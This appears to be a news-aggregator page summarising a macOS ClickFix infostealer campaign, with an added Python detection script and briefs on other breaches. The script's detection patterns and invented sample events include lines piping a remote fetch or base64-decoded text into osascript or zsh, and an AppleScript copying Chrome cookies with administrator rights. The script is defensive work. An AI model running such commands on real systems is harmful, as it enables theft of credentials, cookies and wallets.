Newspaper

Cybersecurity & Privacy

ClickFix Malware Hits macOS Hard

22 April 2026 · 1 source

A new ClickFix campaign is targeting macOS users with an AppleScript-based infostealer that harvests credentials, session cookies and cryptocurrency wallet data from more than 14 browsers and 16 wallet apps. The lure is a fake CAPTCHA or "fix" page that instructs the victim to copy a command and run it in Terminal; that pasted command fetches and executes the stealer, so no exploit is needed, only the user's own action. The campaign has primarily hit finance-sector workers in Asia. Apple's latest macOS updates include protections against this class of attack, but older systems remain exposed. Users should update now and treat any web page that asks them to paste a command into Terminal as a scam.
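As an added example, not code from The Register's report or from the campaign itself, the following Python scores macOS process-execution events for the generic ClickFix chain the summary describes: a command pasted into an interactive shell that fetches or decodes a payload and pipes it straight into osascript or another interpreter, an inline AppleScript that shells out or asks for administrator rights, and reads of browser cookie, wallet or keychain paths. The tab-separated event format, the sample events, the host example.invalid and the scoring weights are all constructed for illustration; the path list names well-known default locations, not indicators from this campaign.

```python
"""Heuristic triage of macOS process events for ClickFix-style AppleScript
stealer behaviour. Added example: the event format (timestamp, parent
process name, command line, tab-separated) is a constructed simplification,
not any vendor's telemetry schema, and every sample event below is invented."""
import re
from dataclasses import dataclass, field

# Generic ClickFix tells on macOS. Weights are illustrative assumptions.
PIPE_TO_INTERPRETER = re.compile(r"\|\s*(osascript|bash|sh|zsh)\b")   # +3
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b")                          # +1
DECODE = re.compile(r"base64\s+(-d|-D|--decode)\b")                    # +1
INLINE_SCRIPT = re.compile(r"\bosascript\b.*\s-e\s")                   # +2
DO_SHELL_SCRIPT = re.compile(r"do shell script", re.I)                 # +2
ADMIN_PROMPT = re.compile(r"with administrator privileges", re.I)      # +2
# Default locations of browser cookies, wallet data and keychains.
SENSITIVE_PATHS = re.compile(                                          # +3
    r"Library/Application Support/(Google/Chrome|BraveSoftware|Exodus|Electrum)"
    r"|Library/Cookies|Library/Keychains"
)
INTERACTIVE_SHELLS = {"Terminal", "zsh", "bash"}                       # +1


@dataclass
class Finding:
    ts: str
    parent: str
    score: int
    reasons: list[str] = field(default_factory=list)


def parse_event(line: str) -> tuple[str, str, str]:
    """Split one constructed '<ts>\\t<parent>\\t<cmdline>' record."""
    ts, parent, cmd = line.rstrip("\n").split("\t", 2)
    return ts, parent, cmd


def score_command(parent: str, cmd: str) -> tuple[int, list[str]]:
    """Return a heuristic score and the reasons that contributed to it."""
    checks = [
        (PIPE_TO_INTERPRETER, 3, "output piped straight into an interpreter"),
        (REMOTE_FETCH, 1, "remote fetch on the command line"),
        (DECODE, 1, "base64 decode on the command line"),
        (INLINE_SCRIPT, 2, "osascript with an inline -e script"),
        (DO_SHELL_SCRIPT, 2, "AppleScript 'do shell script'"),
        (ADMIN_PROMPT, 2, "AppleScript asks for administrator privileges"),
        (SENSITIVE_PATHS, 3, "touches browser cookie, wallet or keychain data"),
    ]
    score, reasons = 0, []
    for pattern, weight, why in checks:
        if pattern.search(cmd):
            score += weight
            reasons.append(why)
    # A pasted ClickFix command runs from the user's own shell; only count
    # that once some other signal is present, or every 'ls' would score.
    if score and parent in INTERACTIVE_SHELLS:
        score += 1
        reasons.append("launched from an interactive shell")
    return score, reasons


def triage(lines, threshold: int = 4) -> list[Finding]:
    """Return the events whose score reaches the threshold, in input order."""
    findings = []
    for line in lines:
        ts, parent, cmd = parse_event(line)
        score, reasons = score_command(parent, cmd)
        if score >= threshold:
            findings.append(Finding(ts, parent, score, reasons))
    return findings


# Constructed sample telemetry: three ClickFix-shaped events and three benign ones.
SAMPLE_EVENTS = [
    "2026-04-21T09:12:03Z\tTerminal\tcurl -fsSL https://example.invalid/captcha/verify | osascript",
    "2026-04-21T09:12:05Z\tzsh\techo ZWNobyBoaQo= | base64 -d | zsh",
    "2026-04-21T09:12:06Z\tosascript\tosascript -e 'do shell script \"cp ~/Library/Application Support/Google/Chrome/Default/Cookies /tmp/c\" with administrator privileges'",
    "2026-04-21T10:00:00Z\tFinder\tosascript -e 'tell application \"Safari\" to activate'",
    "2026-04-21T10:01:00Z\tTerminal\tbrew update",
    "2026-04-21T10:02:00Z\tzsh\tcurl -fsSL https://example.invalid/file.tar.gz -o /tmp/file.tar.gz",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.ts} parent={f.parent} score={f.score}: {'; '.join(f.reasons)}")
```

Run against the sample set, the three ClickFix-shaped events are flagged (scores 5, 5 and 9) while the Finder-launched AppleScript, the package update and the plain download stay below the threshold. The weights and threshold are starting points to tune against real telemetry, and a hit is a triage lead, not proof of compromise: the strongest signal is still the parent chain, a command that arrived by paste into Terminal and then spawned osascript.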

Sources (1)

macOS ClickFix attacks deliver AppleScript stealers to snarf credentials, wallets. The Register, 21 Apr 2026, 15:50

More from Cybersecurity & Privacy

  • North Korea’s $300M Crypto Heist Exposed

    A cryptocurrency theft of nearly $300 million hit the KelpDAO vault this weekend, the largest crypto heist of 2026 so far. Authorities and security researchers point to North Korea's Lazarus Group as the likely culprit, in keeping with the regime's pattern of funding its weapons programmes through cybercrime. The attackers compromised two blockchain servers hosted by LayerZero, but officials say there is no sign of contagion to other DeFi platforms. The incident raises fresh concerns about the security of decentralised finance and the growing threat from state-backed attackers.

  • Massive Data Breach Hits France Titres

    France Titres, the French government agency that issues official identity documents, confirmed a data breach last week after a hacker group claimed to have stolen up to 19 million records. The compromised data includes names, birth dates, email addresses and postal addresses, which exposes citizens to targeted phishing. The agency says the leaked data alone does not allow access to its portals, but urges vigilance against suspicious communications. Investigations continue with the authorities involved, and notifications to affected individuals are under way.

  • Vercel Breach Reveals OAuth Blind Spot

    Vercel confirmed a serious security breach stemming from a compromised OAuth token linked to an AI tool vendor, Context.ai. Attackers exploited broad OAuth permissions granted by a Vercel employee, gaining access to internal systems and environment variables not marked as sensitive. This incident highlights a critical gap in OAuth oversight and environment variable classification that allowed attackers to escalate privileges undetected. Moving forward, Vercel has tightened defaults and is collaborating with partners like GitHub and Microsoft to prevent future attacks.

  • SystemBC Proxy Uncovers 1,570+ Ransomware Victims

    Security researchers at Check Point have identified more than 1,570 victims of the Gentlemen ransomware operation by analysing a command-and-control server for the SystemBC proxy malware the group uses. The finding shows the scale of the operation, which targets Windows, Linux and NAS systems. The Gentlemen gang disables defences and abuses Group Policy Objects to push its payload domain-wide. As the ransomware ecosystem evolves rapidly, the finding underscores the need for stronger defences worldwide.

  • CISA Flags Critical SD-WAN Flaws Exploited

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urgently ordered federal agencies to patch three critical vulnerabilities in Cisco's Catalyst SD-WAN Manager by April 24. These flaws, including CVE-2026-20133, have been actively exploited to access sensitive system information, posing serious risks to network security. Cisco patched these issues in February, but attacks continue, prompting CISA to add them to its Known Exploited Vulnerabilities Catalog. Agencies must follow CISA's emergency directives immediately to prevent further breaches.

  • 22 Flaws Threaten Industrial Serial Converters

    Security researchers have uncovered 22 vulnerabilities in popular Lantronix and Silex serial-to-IP converters, exposing nearly 20,000 devices worldwide to potential takeover and data tampering. These flaws, dubbed BRIDGE:BREAK, enable attackers to hijack critical industrial communication links, risking disruption of legacy systems connected over IP networks. Both vendors have issued patches, but experts warn that network segmentation and strong credentials are essential to prevent exploitation. The discovery underscores growing cybersecurity risks in industrial control environments as legacy gear connects to modern networks.

  • Senior Scattered Spider Hacker Pleads Guilty

    Tyler Robert Buchanan, a 24-year-old senior member of the notorious cybercrime group Scattered Spider, has pleaded guilty to wire fraud conspiracy and aggravated identity theft. His role in 2022 SMS phishing attacks led to breaches at major tech firms like Twilio and LastPass, resulting in over $8 million stolen in cryptocurrency. Buchanan, now in U.S. custody, faces up to 22 years in prison with sentencing set for August 2026. This plea marks a significant step in dismantling the group, with other members still awaiting trial.

  • Credential Theft: The Silent Cyber Threat

    Despite the cybersecurity industry's focus on complex threats like zero-days and AI exploits, stolen credentials remain the easiest and most common way attackers breach systems. Identity-based attacks allow hackers to bypass defenses simply by using valid usernames and passwords, making detection difficult. With AI accelerating these attacks, incident response teams must adopt dynamic, iterative strategies like DAIR to keep pace. Training and communication are now critical to defending against these stealthy intrusions.

  • NGate Malware Hits Brazil's NFC Payments

    A new NGate Android malware campaign is targeting Brazilian users by trojanizing the HandyPay NFC payment app to steal card data and PINs. The malicious app tricks victims into setting it as the default payment tool, then captures NFC card info and PINs to enable unauthorized ATM withdrawals and payments. This campaign, active since November 2025, exploits fake lottery websites and counterfeit Google Play pages to distribute the malware. Security experts warn this marks a rise in NFC fraud, urging users to avoid unofficial app sources and disable NFC when not in use.
